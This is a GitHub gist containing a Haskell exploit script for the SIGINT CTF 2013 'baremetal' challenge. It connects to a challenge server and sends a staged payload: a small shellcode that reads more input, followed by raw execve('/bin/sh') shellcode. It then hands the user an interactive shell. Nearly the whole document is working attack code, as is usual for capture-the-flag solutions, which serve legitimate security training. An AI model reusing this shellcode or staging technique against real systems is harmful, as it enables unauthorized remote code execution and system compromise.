Created
October 21, 2017 11:25
-
-
Save Tosainu/1ee7251677989b0e4bf2c6bae68a705b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env stack | |
-- stack --stack-yaml ./stack.yaml runghc | |
-- SIGINT CTF 2013: baremetal | |
-- http://shell-storm.org/repo/CTF/SIGINT-2013/pwning/baremetal-100/ | |
{-# LANGUAGE OverloadedStrings #-} | |
import Control.Concurrent (threadDelay) | |
import Control.Monad | |
import Control.Monad.Reader (runReaderT) | |
import Data.Bits | |
import qualified Data.ByteString.Char8 as BS | |
import Data.Char | |
import Data.Maybe | |
import Data.Monoid ((<>)) | |
import Hexdump | |
import Numeric | |
import System.Environment (getArgs) | |
-- https://github.com/Tosainu/pwn.hs | |
import Pwn | |
show' :: (Show a) => a -> BS.ByteString | |
show' = BS.pack . show | |
main :: IO () | |
main = getArgs >>= selectTube >>= exploit | |
where selectTube ("remote":_) = remote "chall.pwnable.tw" 10102 | |
selectTube _ = remote "192.168.122.10" 4000 | |
exploit :: (Tube a) => a -> IO () | |
exploit r = do | |
let stage1 = [ 0xff | |
, 0x87, 0xcf -- xcng edi, ecx | |
, 0x31, 0xdb -- xor ebx, ebx | |
, 0x8d, 0x43, 0x03 -- lea eax, [ebx+3] | |
, 0x8d, 0x53, 0x7f -- lea edx, [ebx+0x7f] | |
, 0xcd, 0x80 -- int 0x80 | |
, 0x90 -- nop | |
] | |
-- 0x1ee7 = sum(stage1) + 0xff * n | |
(n, rem) = (0x1ee7 - sum stage1) `quotRem` 0xff | |
xchg_eax_edi = "\x97" | |
buf' = BS.concat [ BS.pack $ map chr stage1 | |
, BS.replicate n '\xff' | |
, BS.singleton $ chr rem | |
, "\x00" | |
] | |
buf = buf' <> BS.replicate (0x3c - BS.length buf') '\x90' <> xchg_eax_edi | |
send r buf | |
let buf = BS.replicate (length stage1) '\x90' <> | |
"\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80" | |
sendline r buf | |
interactive r |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment